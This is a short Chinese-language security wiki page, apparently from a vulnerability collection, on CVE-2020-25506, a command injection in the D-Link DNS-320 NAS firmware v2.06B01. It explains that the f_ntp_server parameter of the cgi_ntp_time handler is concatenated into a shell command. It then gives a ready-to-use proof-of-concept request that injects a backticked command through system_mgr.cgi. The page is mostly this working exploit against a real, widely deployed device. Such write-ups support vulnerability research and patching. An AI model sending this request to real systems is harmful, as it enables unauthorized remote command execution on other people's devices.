menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right D-LInk DNS320 FW v2.06B01 命令注入(CVE-2020-25506).md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    D-LInk DNS320 FW v2.06B01 命令注入(CVE-2020-25506).md
    521 B / 2021-05-21 09:14:38
        # D-LInk DNS320 FW v2.06B01 命令注入(CVE-2020-25506)
    
    固件版本为v2.06B01(ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DNS-320/REVA/DNS-320_REVA_FIRMWARE_v2.06B01.zip)
    
    'cgi_ntp_time'函数中存在命令注入。'v6'的值与“(sntp-r%s> / dev / null”)拼接,然后传递到系统中执行
    
    PoC:
    
    ```
    /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`id`
    ```
    
    ref:
    
    * https://nvd.nist.gov/vuln/detail/CVE-2020-25506
    * https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675
    
    links
    file_download